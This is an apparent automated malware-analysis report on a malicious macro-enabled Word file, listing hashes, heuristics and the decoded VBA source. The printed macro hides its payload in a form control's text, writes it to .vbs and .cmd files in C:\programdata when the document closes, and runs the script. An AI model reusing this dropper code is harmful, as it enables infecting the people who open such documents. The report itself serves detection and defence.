Malicious Office (OOXML) / .DOC — malware analysis report

Static analysis result for SHA-256 69ed478880bc0a1e…

MALICIOUS

Office (OOXML) / .DOC

113.2 KB Created: 2020-06-22 11:03:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2020-07-24
MD5: f7600bc1f4a7454982b66f889b9f13ac SHA-1: 171bdd7062e16101cea2fd7e993e0af412cf81c6 SHA-256: 69ed478880bc0a1ed8f0f45db3b4cd466b580fa08170f60b5cb99e5506776149
110 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is an OOXML document containing a VBA macro with a Document_Open auto-execution subroutine. The macro utilizes ShellExecute to open a file, which is a common technique for executing downloaded payloads. The presence of obfuscated VBA code and the high heuristic scores for VBA macro execution indicate malicious intent.

Heuristics 5

  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
     Private Sub Document_open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3378 bytes
SHA-256: 02bbb3860fa7ec50b4edc46abe96053b8f1cefdaaa043c3cb2555c8e08a4d4f2
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Ferkigo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Ters, 1, 0, MSForms, OptionButton"




Public G, strTemp$, strReturn$, Biola$, CurFolder$, saveFolder

Private Tijd
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hWnd As Long, ByVal lpszOp As String, ByVal lpszFile As String, ByVal lpszParams As String, ByVal lpszDir As String, ByVal FsShowCmd As Long) As Long
 
Private Declare Function GetDesktopWindow Lib "USER32" () As Long
 
Const SW_SHOWNORMAL = 1
 
Const SE_ERR_FNF = 2&
Const SE_ERR_PNF = 3&
Const SE_ERR_ACCESSDENIED = 5&
Const SE_ERR_OOM = 8&
Const SE_ERR_DLLNOTFOUND = 32&
Const SE_ERR_SHARE = 26&
Const SE_ERR_ASSOCINCOMPLETE = 27&
Const SE_ERR_DDETIMEOUT = 28&
Const SE_ERR_DDEFAIL = 29&
Const SE_ERR_DDEBUSY = 30&
Const SE_ERR_NOASSOC = 31&
Const ERROR_BAD_FORMAT = 11&
 
Private Function StartDoc(DocName As String) As Long


   

Dim Scr_hDC As Long

   

   

        Scr_hDC = GetDesktopWindow()


   

        StartDoc = ShellExecute(Scr_hDC, "Open", DocName, "", "C:\", 0)

   

End Function
 Private Sub Document_open()
             Tijd = Timer()
   While Timer() - Tijd < 0.2
   DoEvents
   Wend
    Tijd = Timer()
   While Timer() - Tijd < 0.2
   DoEvents
   Wend
    Tijd = Timer()
   While Timer() - Tijd < 0.2
   DoEvents
   Wend
    Tijd = Timer()
   While Timer() - Tijd < 0.2
   DoEvents
   Wend
    Tijd = Timer()
   While Timer() - Tijd < 0.2
   DoEvents
   Wend
               Tijd = Timer()
   While Timer() - Tijd < 0.2
   DoEvents
   Wend
    Tijd = Timer()
   While Timer() - Tijd < 0.2
   DoEvents
   Wend
    Tijd = Timer()
   While Timer() - Tijd < 0.2
   DoEvents
   Wend
    Tijd = Timer()
   While Timer() - Tijd < 0.2
   DoEvents
   Wend
    Tijd = Timer()
   While Timer() - Tijd < 0.2
   DoEvents
   Wend
Application.Quit SaveChanges:=wdDoNotSaveChanges
            Tijd = Timer()
   While Timer() - Tijd < 0.2
   DoEvents
   Wend
    Tijd = Timer()
   While Timer() - Tijd < 0.2
   DoEvents
   Wend
    Tijd = Timer()
   While Timer() - Tijd < 0.2
   DoEvents
   Wend
    Tijd = Timer()
   While Timer() - Tijd < 0.2
   DoEvents
   Wend
    Tijd = Timer()
   While Timer() - Tijd < 0.2
   DoEvents
   Wend
               Tijd = Timer()
   While Timer() - Tijd < 0.2
   DoEvents
   Wend
    Tijd = Timer()
   While Timer() - Tijd < 0.2
   DoEvents
   Wend
    Tijd = Timer()
   While Timer() - Tijd < 0.2
   DoEvents
   Wend
    Tijd = Timer()
   While Timer() - Tijd < 0.2
   DoEvents
   Wend
    Tijd = Timer()
   While Timer() - Tijd < 0.2
   DoEvents
   Wend
 End Sub


 Private Sub Document_close()


saveFolder = "C:\programdata"


Fipolas = Ferkigo.Ters.GroupName

Fipolas1 = Ferkigo.Ters.Caption



Rolase = saveFolder & "\Gerta.vbs"
Open Rolase For Output As #1
Print #1, Fipolas1
Close #1


Rolase1 = saveFolder & "\Gerta.cmd"
Open Rolase1 For Output As #1
Print #1, Fipolas
Close #1


r& = StartDoc(saveFolder & "\Gerta.vbs")

End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 32256 bytes
SHA-256: c3a85bfb3f3b543598b63fa11af597c7c74374d1d172027ff5d6865440b1cd31
Detection
ClamAV: No threats found
Obfuscation or payload: likely
303 of 466 identifiers look randomly generated (e.g. 'ngcnESocmJEijPkpxnccbgCJQvIHYbeVuJCmUrTZ') — consistent with name-mangling obfuscation.